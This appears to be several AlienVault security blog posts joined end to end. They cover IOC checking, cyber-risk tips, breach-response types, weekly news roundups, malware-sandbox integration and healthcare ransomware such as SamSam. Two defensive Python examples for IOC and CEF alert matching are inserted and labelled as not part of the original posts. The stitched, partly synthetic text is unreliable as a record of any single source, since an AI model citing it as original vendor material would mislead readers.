AlienVault Labs has identified more than 660 Indicators of Compromise (IOCs) associated with this campaign, which are shared in OTX. You can use USM Anywhere or OSSIM to directly check for these IOCs throughout your attack surface. The Labs team has also released IDS signatures and correlation rule updates to the USM Anywhere platform so customers can identify suspicious activity that could be related to this campaign.

For further investigation, visit the Open Threat Exchange (OTX) to see what research members of the community have shared: https://otx.alienvault.com/pulse/59096495b8eeba365246b24d/

Also, check out US-CERT Alert (TA17-117a), last revised December 20, 2018.
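A minimal version of the IOC sweep the paragraph above describes, as an added example written for this page. It is not code from the original post, from OTX, or from USM Anywhere / OSSIM. It takes a list of indicators (domains, IP addresses, SHA-256 hashes), normalizes them, and matches them against DNS, proxy, flow and endpoint log lines, treating a subdomain of an indicator domain as a hit. The indicator values are constructed placeholders, not the campaign's real IOCs; the indicator-type labels are modelled on OTX's naming but are an assumption here, as are the log formats and the sample lines.

```python
"""Added example, not code from the original post, OTX or USM/OSSIM: an IOC
sweep matching a list of indicators against log lines. Indicator values are
constructed placeholders, never the campaign's real IOCs; the indicator-type
labels, log formats and sample lines are assumptions made for this example."""
import ipaddress
import re
from collections import defaultdict

# Constructed indicator list as (type, value) pairs; every value is a placeholder
INDICATORS = [
    ("domain", "update.example.invalid"),
    ("hostname", "CDN.example.invalid."),   # mixed case and trailing dot are normalized away
    ("IPv4", "203.0.113.77"),
    ("FileHash-SHA256", "A" * 64),          # placeholder hash, not a real sample
]

# Assumed log formats; each yields a source (client/host) and one value to check
LOG_PATTERNS = [
    ("dns", re.compile(r"^(?P<ts>\S+) DNS client=(?P<src>\S+) q=(?P<value>\S+)$")),
    ("proxy", re.compile(r"^(?P<ts>\S+) PROXY client=(?P<src>\S+) host=(?P<value>\S+)$")),
    ("netflow", re.compile(r"^(?P<ts>\S+) FLOW src=(?P<src>\S+) dst=(?P<value>\S+)$")),
    ("endpoint", re.compile(r"^(?P<ts>\S+) EXEC host=(?P<src>\S+) sha256=(?P<value>[0-9a-fA-F]{64})$")),
]


def index_indicators(indicators):
    """Group indicators by kind, normalized so later lookups are exact set membership."""
    idx = {"domain": set(), "ip": set(), "sha256": set()}
    for itype, value in indicators:
        kind = itype.lower()
        if kind in ("domain", "hostname"):
            idx["domain"].add(value.lower().rstrip("."))
        elif kind in ("ipv4", "ipv6"):
            idx["ip"].add(str(ipaddress.ip_address(value)))  # canonical textual form
        elif kind == "filehash-sha256":
            idx["sha256"].add(value.lower())
    return idx


def domain_hit(name, domains):
    """True if `name` itself or any parent domain of it is an indicator."""
    labels = name.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels)))


def match_indicator(value, idx):
    """Return (kind, normalized value) for a log value that matches, else None."""
    low = value.lower().rstrip(".")
    if low in idx["sha256"]:
        return "sha256", low
    try:
        ip = str(ipaddress.ip_address(low))
        return ("ip", ip) if ip in idx["ip"] else None
    except ValueError:
        pass  # not an IP literal, so treat it as a name
    if domain_hit(low, idx["domain"]):
        return "domain", low
    return None


def sweep(lines, indicators):
    """Scan log lines; return hits as {source: [(log_type, kind, value), ...]}."""
    idx = index_indicators(indicators)
    hits = defaultdict(list)
    for line in lines:
        for log_type, rx in LOG_PATTERNS:
            m = rx.match(line.strip())
            if not m:
                continue
            found = match_indicator(m["value"], idx)
            if found:
                hits[m["src"]].append((log_type, found[0], m["value"]))
            break  # first matching format wins
    return dict(hits)


# Constructed sample logs (not real data)
SAMPLE_LINES = [
    "2019-02-01T08:00:00Z DNS client=10.0.0.14 q=a1.update.example.invalid.",
    "2019-02-01T08:00:05Z PROXY client=10.0.0.14 host=cdn.example.invalid",
    "2019-02-01T08:01:00Z FLOW src=10.0.0.14 dst=203.0.113.77",
    "2019-02-01T08:01:30Z FLOW src=10.0.0.15 dst=198.51.100.20",
    "2019-02-01T08:02:00Z EXEC host=ws-14 sha256=" + "a" * 64,
    "2019-02-01T08:03:00Z DNS client=10.0.0.16 q=www.example.org",
]


def run_sample():
    """Sweep the constructed logs with the constructed indicator list."""
    return sweep(SAMPLE_LINES, INDICATORS)


if __name__ == "__main__":
    for src, matches in run_sample().items():
        print(src, matches)
```

The normalization is the part that matters in practice: indicator feeds and logs disagree on case, trailing dots and IPv6 spelling, and an exact-string comparison on raw values misses hits that a canonical form catches. Parent-domain matching is why the query for `a1.update.example.invalid` is reported even though only the parent domain is on the list.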
With the constant barrage of headlines regarding breaches in the last few years, it seems that society in general has become numb to losing personal data. This year's overarching cybersecurity theme is clear: we're all in this together because we simply can't do it alone. Effective defense demands a team effort where employees, enterprises, and end users alike recognize their shared role in reducing cybersecurity risks. To borrow a phrase from John Lewis, "If not us, then who? If not now, then when?" Here are tips for improving your cyber risk management this year.

Tip #1: Balance risk versus reward.

The key is to balance risks against rewards by making informed risk management decisions that are aligned with your organization's objectives — including your business objectives. This process requires you to:

- Assign risk management responsibilities;
- Establish your organization's risk appetite and tolerance;
- Adopt a standard methodology for assessing risk and responding to risk levels; and
- Monitor risk on an ongoing basis.

Tip #2: Use your investments wisely.

When determining the best strategy for future cyber investments, it's vital that you review your organization's current security posture and existing security controls, including technology, people and processes. Before making new investments, perform an architectural and program review to understand how the existing controls can be utilized to address your identified risks. There are almost always ways to optimize, reduce cost, or minimize upcoming investments.

Tip #3: Be nimble; make sure your strategy can quickly adapt.

Business is not static and neither are the solutions that enable and protect it. To grow, compete, and own its place in the market, a business must adopt new models and technologies to stay relevant and competitive. As the business evolves, so too must the operations and security solutions that protect it.
Today, a cybersecurity strategy needs to be nimble to match the pace and dynamic modeling of the business it is protecting. Tip #4: Don’t lose sight of the data — are you asking the right questions? Before analyzing your security controls, take a step back to understand what data is needed to support the business, who that data must be shared with, and where that data is stored. Look at your operations, the flow of data into, throughout, and outside of your organization, and the risks associated with your business model. This will give you an understanding of the exposures that the data faces, enabling you to address and prioritize security measures. The three questions most organizations should be asking are: How secure are we? Are we going to be secure based on our current and future business plans? Are we investing the right amount of time and resources to minimize risk and ensure security — especially people, technology and process? Tip # 5: Re-imagine your security approach; don’t go looking for the silver bullet. The cybersecurity market is flooded with solutions, leaving many organizations struggling to select the right protection for their business and get the best value from their investments. Most cybersecurity solutions, however, are point solutions, which don’t adequately address today’s threats. Tip # 6: Make security awareness stick. More than 90 percent of security breaches involve human error. These acts are not always malicious, but often careless and preventable. To change security behavior effectively, employees must know what to do, care enough to improve, and then do what’s right when it matters. An effective security awareness program can help change organizational behavior and lower risk. Look for best practices for implementing a successful security awareness training program to change employee behavior and help make your organization more secure. 
Consider the answers to the following questions.: Does the program assess your users’ ability to spot real-world phishing attacks? How is the training delivered to help employees identify phishing and other social engineering tactics? Is there flexibility for planning, scheduling, and running the program? Tip #7: Think beyond compliance. Achieving Compliance is not the ultimate goal, it is about sustaining compliance. Security and Compliance are not equal. Compliance management is not a project that you start and finish, but rather an ongoing program that needs to be continuously maintained. To make the journey easier, follow an integrated compliance and risk management framework that addresses security, privacy, risk, and compliance, such as the National Institute of Standards of Technology (NIST) framework. This ensures a more manageable program and allows you to report compliance posture more efficiently.
Breaches aren't easy to deal with, especially if you are of the opinion that companies are people too. Having seen, been part of, and lent a shoulder to many a breach, here are nine of the common ways companies respond to breaches.
Delayed response
A delayed response is when a breach has occurred and the company is informed long after the fact, usually when the data appears on a dark web sharing site. The company is sometimes informed by law enforcement, or by reading about it on Brian Krebs' blog.
Complicated response (traumatic or prolonged)
A complicated breach becomes more severe with time and can impact the entire company. This can be the case when regulators step in to look at a breach. Were you PCI DSS compliant? Well, not anymore. Did you hold European citizens' data? Well, say hello to my little GDPR friend.
Disenfranchised response
Disenfranchised breaches are where the company experiences a loss, but others do not acknowledge the importance or impact. For example, an intellectual property breach that allows a competitor to get ahead is felt keenly by the company, but elicits little, if any, sympathy from customers.
Cumulative response
A cumulative breach is when multiple breaches or incidents are experienced, often within a short period of time. For example, getting locked out of your IoT device accounts while records are being exfiltrated from the mainframe during a DDoS attack. A cumulative breach can be particularly stressful because the company doesn't have time to properly respond to one incident, stating how it "takes security seriously", before experiencing the next.
Distorted response
Sometimes a company responds to a breach in extreme and hostile ways. In a manner befitting a toddler, the company may resort to blaming a partner or any other third-party company. On occasion the finger of blame is pointed at an employee or contractor for not patching a system. Or, in some cases, the company will want to set an example and unceremoniously fire the CISO.
Inhibited response
Also known as "keep this between us", this is a conscious decision by a company to keep details of a breach limited to a very small group. Problems occur if customers or regulators get wind of it, and it can cause bigger issues down the road. By then, the only viable option for the company is to shred the documents, wipe the hard drives, and research countries without extradition treaties.
Collective response
A collective breach is felt by a wider group, and the impact is shared. It can be a useful tactic for bringing everyone onto the same side and putting their differences aside. When everyone is forced to change their passwords after a breach, it gives them common ground to share the pain.
Absent response
A favourite of social media giants, an absent response is when a company doesn't acknowledge or show signs of any response. This can be the result of shock, denial, or simply folding everything into business as usual. It's important to note that in some instances, just because you can't see the signs of a response, it doesn't necessarily mean that a company isn't taking responsive actions. Or it could just mean they don't care; it can be hard to tell.
Anticipatory response
Remember all those posters telling you "it's not a matter of if, but when"? Well, that can have a positive effect, as companies go into anticipatory mode, expecting a breach and preparing accordingly. It doesn't lessen the sting of a breach, but it does mean you have plans in place to respond and recover.
And in what feels like a blink of an eye, January 2019 is almost over. Time sure does fly when you're having fun. But we're not here to have fun; this is a serious weekly roundup of all the security news and views, with a few cynical observations thrown in for good measure.
Tables Turn on Journalists
Colorado journalists on the crime beat are increasingly in the dark. More than two dozen law enforcement agencies statewide have encrypted all of their radio communications, not just those related to surveillance or a special or sensitive operation. That means journalists and others can't listen in using a scanner or smartphone app to learn about routine police calls. Law enforcement officials say that's basically the point. Scanner technology has become more accessible through smartphone apps, and encryption has become easier and less expensive. Officials say that encrypting all radio communications is good for police safety and effectiveness, because suspects sometimes use scanners to evade or target officers, and good for the privacy of crime victims, whose personal information and location can go out over the radio. How long before journalists start touting, "If you're innocent you have nothing to fear"? What would really be ironic is if journalists asked that police put backdoors into their comms so that journalists could listen in.
Encryption efforts in Colorado challenge crime reporters, transparency | Columbia Journalism Review
Would a Detection by Any Other Name Detect as Well?
One detection category is not necessarily "better" than other categories. While detection categories and descriptions might lead one to think that certain categories are better, the category alone is not enough to give a complete picture of the detection. It's important to look at the technique under test, the detection details, and what's considered normal behavior in your organization's environment to help you understand which detections are most useful to you.
Part 1: Would a Detection by Any Other Name Detect as Well? | Frank Duff, Medium
Breach of the Week
Over 24 million financial and banking documents were found online by researcher Bob Diachenko, as one does, I suppose. The server, running an Elasticsearch database, held more than a decade's worth of data, containing loan and mortgage agreements, repayment schedules and other highly sensitive financial and tax documents that give an intimate insight into a person's financial life.
Millions of bank loan and mortgage documents have leaked online | TechCrunch
Voicemail Phishing Campaign Tricks You Into Verifying Password
A new phishing campaign is underway that uses EML attachments pretending to be a received voicemail and prompts you to log in to retrieve it. This campaign also uses a clever tactic of tricking you into entering your password twice in order to confirm that you are providing the correct account credentials.
Voicemail Phishing Campaign Tricks You Into Verifying Password | Bleeping Computer
265 Researchers Take Down 100,000 Malware Distribution Websites
In a showcase of the good that can happen when the right people come together, security researchers across the globe, united in a project dedicated to sharing URLs used in malicious campaigns, managed to take down close to 100,000 websites actively engaged in malware distribution. Called URLhaus, the project was initiated by abuse.ch, a non-profit cybersecurity organization in Switzerland. It started at the end of March 2018 and recorded a daily average of 300 submissions from 265 security researchers.
265 Researchers Take Down 100,000 Malware Distribution Websites | Bleeping Computer
VC Funding of Cybersecurity Companies Hits Record $5.3B in 2018
According to new data from Strategic Cyber Ventures, a cybersecurity-focused investment firm with a portfolio of four cybersecurity companies, more than $5.3 billion was funneled into companies focused on protecting networks, systems and data across the world, despite fewer deals being done during the year. That's up 20 percent from the $4.4 billion raised in 2017, and close to double the 2016 total. This isn't Sparta, this really is madness!
VC funding of cybersecurity companies hits record $5.3B in 2018 | TechCrunch
Other Things I Hearted This Week
U.S. CEOs Are More Worried About Cybersecurity Than a Possible Recession | Fortune
How to make it big in tech and still keep the demons at bay | Guardian
How Dr. Jessica Barker brought positivity into cybersecurity | The Cyber Woman
How Much Time Americans Spend In Front Of Screens Will Terrify You | Forbes
What does it mean to be a thought leader? Is it merely the opposite of a thought follower, or is it more nuanced than that? Becoming a thought leader is the epitome of professional success. But thought leader isn't a title that one attains by going to Harvard or Cambridge. No, it's a title bestowed by your peers. But wait, there are many naysayers in this world who will try to make out that thought leadership is a made-up marketing term. But they're wrong. Thought leaders are the future; with them, the future is bright, and they will lead us to an enlightened future where blockchains and machine learning co-exist in harmony, fuelled by cryptocurrencies and moderated by artificial intelligence. So how does one become known as a thought leader? Simple: just watch this video and follow the awesome advice given by me and @SpaceRog @J4vv4D
67% of small and micro businesses have experienced a cyber attack, and 58% have experienced a data breach, within the last 12 months, according to a study conducted by the Ponemon Institute. Cybersecurity has become one of the major questions of the 21st century, with numerous businesses reporting significant losses from the loss of private customer data, denial of service (DoS) attacks that cripple operations, and insider threats that pose a growing data security challenge for both small and large companies. When you consider the effects of the cyber attack in Alaska and the number of organizations it crippled, it's clear that business owners need to understand the threats they face today.
The Question of Cybersecurity
A few decades ago, the thought of cyber warfare would have seemed far-fetched, to say the least. Today it is as likely as it is alarming, especially when you consider how many of our gadgets are connected to the internet: mobile phones, smart TVs, PCs, and IoT devices. Advances in attack techniques have driven parallel advances in data protection. Where installing antivirus software may once have been sufficient, it is now only a baseline measure that must be coupled with stronger controls such as two-factor authentication, access control, and raising threat awareness. The cybersecurity industry grows steadily, and it is now possible to find adequate protection for all your gadgets, from your phone to your tablet and, yes, even your new television set.
Artificial Intelligence Shaping Cybersecurity
If you have a basic interest in the tech world, you will have come across Sophia, a humanoid robot that many regard as the perfect illustration of how far AI has come. In cybersecurity, the same family of techniques is being applied to synthesize data: combining independent pieces of information (for example, an endpoint alert and a network flow record) to arrive at a single conclusion about whether activity is malicious. In layman's terms, AI is expected to improve cybersecurity by speeding up incident response when malicious activity is detected, thwarting ransomware, and automating routine practices. This way, companies can stay a step ahead of potential cyber threats.
The Future of Cybersecurity Innovation
Conventionally, data transfer has been achieved through electrical signals. That may change as data exchange through light signals matures, using photons as carriers of quantum information. In entanglement-based quantum key distribution, photons are generated in correlated pairs; with timing controls, a key can only be established when the sender and recipient each hold one photon of a matched pair, and any attempt to intercept and measure a photon in transit disturbs it in a way the two parties can detect. The security of the channel then rests on the laws of physics rather than on the cost of breaking a cipher, although the devices and the classical systems around such a link still have to be implemented and secured correctly. More innovations in deep learning, cloud technology, and hardware will revolutionize the future of cybersecurity, making it easier for companies to prevent cyber attacks. The field of cybersecurity is shifting and improving daily to match the changing needs of today's cyberspace. It is essential that everyone, including businesses, becomes familiar with the means to protect their data. Understanding the changing face of cybersecurity is a key step to achieving that goal.
What a wild week it's been. There have been assaults on researchers (OK, just one that I know of), there's a great look into changing company cultures, and RDP has a flaw. All this and more, in this week's action-packed edition of things I hearted this week.
Assaulting Researchers
The short version is that researchers found a significant vulnerability in a vendor's casino app, reported it, and for their troubles were assaulted by the COO. Probably not the bounty any researcher wants in return for trying to do the right thing. It reads like a mixture of a good novel and something you'd imagine playing out on Jerry Springer. There's not enough popcorn for this.
Researcher Assaulted By A Vendor After Disclosing A Vulnerability | Secjuice
Analyzing the 2019 RSA Innovation Sandbox Finalists
With RSA fast approaching, Kelly Shortridge dons her analyst hat and gets to work, this time examining the Innovation Sandbox finalists and their funding status.
Analyzing the 2019 RSA Innovation Sandbox Finalists | Medium, Kelly Shortridge
Related: Kelly's Black Hat USA 2018 business hall analysis
Analyzing the Black Hat USA 2018 Business Hall | Medium, Kelly Shortridge
And while it's a couple of years old now, I can't talk about analysing RSA without Cyentia Institute's brilliant analysis of 15,000 RSAC CFP submissions to uncover trends and evolution.
These cybersecurity words are golden - and so are their insights | RSA
How Hackers and Scammers Break Into iCloud-Locked iPhones
In a novel melding of physical and cybercrime, hackers, thieves, and even independent repair companies are finding ways to "unlock iCloud" from iPhones.
How Hackers and Scammers Break into iCloud-Locked iPhones | Motherboard
Changing Cultures
These days in infosec, we hear a lot about culture change, in particular how it relates to security awareness and training. But one sometimes has to look far and wide for examples of a culture that has been successfully changed in a way that benefited the people as much as the company. This is a fantastic and insightful article into how Satya Nadella tackled the culture challenge within Microsoft.
How do you turn around the culture of a 130,000-person company? Ask Satya Nadella | Quartz
Accidental Personal Info Disclosure Hit Australians 260,000 Times Last Quarter
The latest quarterly report on Australia's Notifiable Data Breaches (NDB) scheme has revealed 269,621 separate cases of individuals having their personal information affected as a result of human error. The report [PDF] says that during the period from October 1 to December 31, 2018, 262 data breach notifications were received by the Office of the Australian Information Commissioner (OAIC), with 85 put down to human error.
Accidental personal info disclosure hit Australians 260,000 times last quarter | ZDNet
WhatsApp 'Deleting 2m Accounts a Month' to Stop Fake News
WhatsApp says it is deleting 2m accounts per month as part of an effort to blunt the use of the world's most popular messaging app to spread fake news and misinformation. The Facebook-owned service published the data as part of a white paper on "stopping abuse" that was launched on Wednesday in India, the company's biggest market with more than 200m users.
WhatsApp 'deleting 2m accounts a month' to stop fake news | Guardian
The Nightmare on Service Desk Street
Many "ITIL aligned" service desk tools have flawed incident management. The reason is that incidents are logged with a time association and some related fields to type some gobbledygook into. The expanded incident life cycle is not enforced, and as a result trending and problem management are not possible.
The nightmare on service desk street | Medium, Ronald Bartels
Remote Desktop Protocol Flaws Could Be Exploited to Attack RDP Clients
A research firm has disclosed multiple vulnerabilities in the Remote Desktop Protocol that, if left unpatched, could allow compromised or infected machines to attack the RDP clients that remotely connect to them. In a blog post, Check Point Software Technologies researcher Eyal Itkin refers to this scenario as a reverse RDP attack, because the RDP servers installed on the compromised machines essentially reverse the normal direction of RDP communication in order to control and execute code on the client device.
Reverse RDP attack | Check Point
Remote Desktop Protocol flaws could be exploited to attack RDP clients | SC Magazine
Google's New Chrome Extension Warns You If Your Passwords Have Been Exposed
Google has rolled out two new tools to help the password-challenged beef up their security game. The first is a Chrome extension called Password Checkup that can identify whether you're using a password that's been exposed in a third-party data breach. The second is a feature called Cross Account Protection, which helps protect apps you've signed into with your Google account.
Google's New Chrome Extension Warns You If Your Passwords Have Been Exposed | Gizmodo
Other Stories I Hearted This Week
Apps you've never heard of that your teen is already using | CNN
When Bad Behavior Goes Viral | Medium, James Rush
Rohan Viegas of VMRay explains some of the key factors IT security teams should consider when evaluating a malware analysis sandbox and whether it's a good fit for their existing SIEM environment. He then outlines how VMRay Analyzer complements and enhances the capabilities of AlienVault's flagship platform, USM Anywhere.
For IT security organizations, malware threats and attacks continue to play a prominent role in the threat landscape. According to Verizon's 2018 Data Breach Investigations Report:
- Of the 2,216 data breaches that were studied by participating security vendors, 30% involved malware.
- Six types of malware (ransomware, C2, RAM scraper, backdoor, etc.) were among the top 20 varieties of action used in the data breaches covered in the study.
- Ransomware, used primarily to commit financial crimes, is now involved in more than 40% of malware attacks.
- Malware attacks can be completed in minutes. However, due primarily to poor detection, an intrusion may not be discovered for weeks or months, potentially causing damage all the while.
"Full-featured SIEM, Looking for the Right Malware Sandbox"
When selecting an automated malware analysis sandbox to address these challenges, IT security teams should not only compare the side-by-side capabilities of different vendor products. They should also weigh how a particular sandbox will interact with their existing SIEM platform and the extent to which a product's strengths (or its weaknesses) are carried across the managed security ecosystem. Below are some key points to consider.
The sandbox's detection efficacy. Malware today is designed to recognize when it is running inside an analysis environment and to stall or exit in the sandbox, thereby evading detection altogether or inhibiting the analysis by not fully revealing its behavior. This leaves blind spots in the analysis results, which are then carried over to the SIEM.
A key quality to look for in a sandbox is its ability to reliably conceal itself from the samples being analyzed, so the malware fully executes and gives you comprehensive visibility into the threat.
The quality of threat intelligence that can be shared. Another consideration is what types of threat information can be ingested by your SIEM and made available across your security environment. Important outputs include severity scores, suspicious behaviors, network activity (contacted IP addresses, domains and URLs), dropped files and their hashes, and so on. You also need to consider how complete that information is. Full visibility into malware behavior is essential for generating quality threat intelligence. For instance, if you discover a malicious file, the analysis results should detail every place it tried to reach, every file it tried to create, and every registry key it tried to read or modify.
How can the threat intelligence be used once your analysis results are handed off to your SIEM? Can the data be easily monitored? Correlated with other data sources? What actions can you take with this information? To build on the prior example, if your sandbox identifies a new malicious file that reached out to an unfamiliar and presumably malicious IP address, can you search your entire infrastructure for systems that have also accessed that address?
Rising to the Challenge
For organizations that have USM Anywhere or another comprehensive SIEM platform in place, adding VMRay Analyzer to the managed security environment addresses these core challenges, strengthening the ability to detect and respond to malware threats, attacks and vulnerabilities more quickly and effectively. Unlike traditional malware sandbox solutions, VMRay Analyzer runs solely in the hypervisor layer and does not modify a single bit in the analysis environment.
The sandbox remains completely invisible to the malware sample and can transparently monitor all aspects of the malware's behavior, without triggering the evasion techniques that thwart detection and analysis in other sandboxes. In turn, analysis results provide complete and detailed visibility. VMRay Analyzer's Intelligent Monitoring engine, for example, works much like an auto-zoom lens on a camera, adjusting to find the optimal level of monitoring. This allows analysts to distinguish between legitimate operations performed by the OS and trusted applications and unusual or malicious activities performed by the monitored sample. The result is that security teams don't miss critical information, while the results stay precise and noise-free, with minimal false positives.
Once VMRay malware analysis results are ingested by the SIEM through VMRay's REST API, that information gains wider use and greater value. It can be monitored, searched, correlated with other data sources, and shared with security devices such as firewalls and endpoint protection systems. It can also be investigated and acted upon. VMRay also has an out-of-the-box SIEM integration that publishes analysis alerts in Syslog/CEF format; these customizable syslog messages are generated when critical events occur.
Here are some of the ways VMRay Analyzer makes SIEM environments such as USM Anywhere more efficient, useful and comprehensive:
- Ensures timely analysis and detection of zero-day and polymorphic threats, as well as known threats, and translates that information into actionable intelligence.
- Automatically propagates analysis results (including sample details, severity scores, IOCs, network activity and YARA rule matches) to the SIEM's centralized environment.
- Improves the productivity and effectiveness of analysts and incident responders by providing all the information they need, and only the information they need, to analyze and respond to malware threats, vulnerabilities and attacks.
- Eliminates the productivity-killing noise and false positives that many sandboxes generate, while also ensuring irrelevant information is not pumped into the SIEM environment.
- Continually adds to the malware-related threat intelligence that is made available to the SIEM.
Sandboxes and SIEMs work in tandem to detect malware and respond to a security breach. Choosing an evasion-resistant sandbox that generates precise, actionable threat intelligence ensures a good fit with your existing SIEM environment.
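The correlation question raised above (which other systems reached the address a sample contacted?) is mechanical once the sandbox alerts reach the SIEM in a parseable form. The following Python is an added example, not VMRay's or AlienVault's code: it parses CEF-formatted sandbox alerts, keeps the network IOCs from the high-severity ones, and matches them against firewall records. The CEF extension keys (dst, dpt, dhost, fileHash, msg) are the ArcSight dictionary names; which keys a particular sandbox emits, the severity threshold, and every alert and log line are constructed assumptions.

```python
"""Added example, not code from the original post, VMRay, or AlienVault:
parse CEF sandbox alerts, pull network IOCs from the severe ones, and find
the internal hosts that contacted those addresses in firewall logs.
Extension key names follow the ArcSight CEF dictionary; the keys a given
sandbox emits, and every log line below, are constructed assumptions."""
import re
from collections import defaultdict

# Split the CEF header on pipes that are not backslash-escaped.
_PIPE_SPLIT = re.compile(r"(?<!\\)\|")
# Extension block: key=value pairs; a value runs until the next " key=" or end.
_KV_PAIR = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
# CEF escapes backslash, pipe (header) and equals (extension) with a backslash.
_UNESCAPE = re.compile(r"\\([\\|=])")


def parse_cef(line):
    """Parse one CEF line into a dict, or return None if it is not CEF."""
    line = line.strip()
    if not line.startswith("CEF:"):
        return None
    parts = _PIPE_SPLIT.split(line, maxsplit=7)
    if len(parts) != 8:
        return None
    version, vendor, product, pversion, sig_id, name, severity, extension = parts
    event = {
        "cef_version": int(version[len("CEF:"):]),
        "vendor": _UNESCAPE.sub(r"\1", vendor),
        "product": _UNESCAPE.sub(r"\1", product),
        "product_version": _UNESCAPE.sub(r"\1", pversion),
        "signature_id": _UNESCAPE.sub(r"\1", sig_id),
        "name": _UNESCAPE.sub(r"\1", name),
        "severity": int(severity),  # assumed numeric 0-10, as the CEF spec allows
    }
    for key, value in _KV_PAIR.findall(extension):
        event[key] = _UNESCAPE.sub(r"\1", value)
    return event


def network_iocs(alert_lines, min_severity=7):
    """Map each destination reported by a sufficiently severe alert to the
    set of alert names that reported it."""
    iocs = defaultdict(set)
    for line in alert_lines:
        event = parse_cef(line)
        if event and event["severity"] >= min_severity and "dst" in event:
            iocs[event["dst"]].add(event["name"])
    return dict(iocs)


def hosts_that_contacted(iocs, firewall_lines):
    """Scan key=value firewall records and return {ioc: sorted sources} for
    every IOC at least one host actually tried to reach (allowed or denied)."""
    hits = defaultdict(set)
    for line in firewall_lines:
        fields = dict(_KV_PAIR.findall(line))
        if fields.get("dst") in iocs and fields.get("src"):
            hits[fields["dst"]].add(fields["src"])
    return {ioc: sorted(srcs) for ioc, srcs in hits.items()}


# Constructed sandbox alerts (CEF) and firewall records for the demonstration.
SANDBOX_ALERTS = [
    "CEF:0|ExampleSandbox|Analyzer|3.0|100|Malicious sample|9|"
    "fileHash=3f786850e387550fdab836ed7e6dc881de23001b dst=198.51.100.23 dpt=443 "
    "dhost=update.example-bad.test msg=Sample beaconed to C2 with path /a\\=b",
    "CEF:0|ExampleSandbox|Analyzer|3.0|101|Suspicious sample|4|"
    "fileHash=89e6c98d92887913cadf06b2adb97f26cde4849b dst=203.0.113.9 dpt=80 "
    "msg=Possible adware check-in",
    "CEF:0|ExampleSandbox|Analyzer|3.0|100|Malicious sample \\| repeat C2|8|"
    "fileHash=2b66fd261ee5c6cfc8de7fa466bab600bcfe4f69 dst=198.51.100.23 dpt=443 "
    "msg=Second sample, same C2",
]
FIREWALL_LOG = [
    "2019-02-01T09:58:02Z fw1 src=10.1.4.22 dst=198.51.100.23 dpt=443 action=allow",
    "2019-02-01T10:02:11Z fw1 src=10.1.7.5 dst=198.51.100.23 dpt=443 action=allow",
    "2019-02-01T10:03:40Z fw1 src=10.1.4.22 dst=93.184.216.34 dpt=443 action=allow",
    "2019-02-01T10:05:09Z fw1 src=10.1.9.14 dst=203.0.113.9 dpt=80 action=deny",
    "2019-02-01T10:06:30Z fw1 src=10.1.4.22 dst=198.51.100.23 dpt=443 action=allow",
]

if __name__ == "__main__":
    iocs = network_iocs(SANDBOX_ALERTS)
    for ioc, sources in hosts_that_contacted(iocs, FIREWALL_LOG).items():
        print(f"{ioc} ({', '.join(sorted(iocs[ioc]))}) reached by: {', '.join(sources)}")
```

The severity gate is deliberate: the low-severity adware alert is parsed but not turned into a hunt, which is the noise-versus-signal trade-off the section above describes. Lowering `min_severity` to 1 pulls 203.0.113.9 into the IOC set and surfaces the host whose connection the firewall denied, which is still worth knowing.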
Healthcare is under fire, and there's no sign of the burn slowing. Look, it's no secret that hackers have been targeting hospitals and other healthcare providers for several years, and probably no surprise that healthcare is one of the top target industries for cybercrime in 2018. In the US alone, more than 270 data breaches affecting nearly 12 million individuals had been submitted to the U.S. HHS Office for Civil Rights breach portal as of November 30, 2018. These include unauthorized access to or disclosure of patient data, hacking, theft of data, data loss and more. Bottom line: if you're tasked with protecting any entity operating in the healthcare sector, you're likely experiencing some very sleepless nights, and may just need a doctor yourself. So . . . who's wreaking all this havoc, and how? According to AlienVault Labs, opportunistic ransomware is still the preferred method of attack. However, researchers are reporting a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities to make money from healthcare providers and similar entities that must keep assets, systems, and networks continuously operating. One such criminal group, operating the SamSam ransomware, is thought to have earned more than $5 million by manually compromising critical healthcare networks (see below for more). The group behind SamSam has invested heavily in its operations (it is likely an organized crime syndicate) and has won the distinction of being the subject of two FBI alerts in 2018. According to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than to typical opportunistic ransomware. SamSam attacks also seem to come in waves. One of the most notable was a spring 2018 hit on a large New York hospital, which publicly declined to pay the attackers' $44,000 ransom demand.
It took a month for the hospital's IT systems to be fully restored. SamSam attackers are known to:
- Gain remote access through traditional attacks, such as JBoss exploits
- Deploy web shells
- Connect to RDP over HTTP tunnels such as ReGeorg
- Run batch scripts to deploy the ransomware across machines
SamSam isn't going away either: AlienVault Labs has seen recent variants. You might want to read more about the threat actors behind SamSam, their methods of attack, and recommendations for heading them off in the AlienVault Open Threat Exchange (OTX), our community of 100,000 users who contribute threat intelligence that is also curated by AlienVault Labs. You can also get more details from the AlienVault blog post "SamSam Ransomware Targeted Attacks Continue." And you can find detailed recommendations for preparing for SamSam and related attacks from HHS, the FBI and US-CERT.
Wait! There's More.
Here is an overview of the trending threats AlienVault Labs has identified for 2018, with what we're seeing and where to learn more.
Opportunistic ransomware for criminal gain
What we're seeing: the most commonly seen threat to healthcare in 2018 remains opportunistic, typically ransomware that targets anyone who happens to be vulnerable, and it continues to cause an outsized amount of damage to the industry. Some of the most damaging examples will likely trigger your memory: WannaCry, GandCrab, VSSDestroy.
How to learn more: Defray ransomware: off-the-shelf ransomware used to target the healthcare sector; GandCrab ransomware puts the pinch on victims; VSSDestroy ransomware; WannaCry indicators; Fallout exploit kit releases the Kraken ransomware on its victims.
Targeted ransomware for criminal gain
What we're seeing: a number of organized criminal groups have moved to targeting healthcare providers with targeted ransomware, because of the criticality of continued operation. One example is SamSam.
How to learn more: SamSam ransomware campaigns; SamSam: the evolution continues, netting over $325,000 in 4 weeks; SamSam ransomware; SamSam: the doctor will see you, after he pays the ransom.
Targeted espionage led by organized crime
What we're seeing: threat actors are committing corporate espionage for criminal gain, for example by gaining insight into drug trials to inform investment decisions.
How to learn more: Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia; Powerful threat actor Wild Neutron returns for economic espionage; FIN4 group is hacking the street; More information on the FIN4 group attacking public companies; Parasite HTTP RAT cooks up a stew of stealthy tricks.
Targeted espionage led by nation states
What we're seeing: while rare, some threat actors commit espionage against the healthcare sector to assist state-owned companies or to retrieve the healthcare data of high-profile individuals.
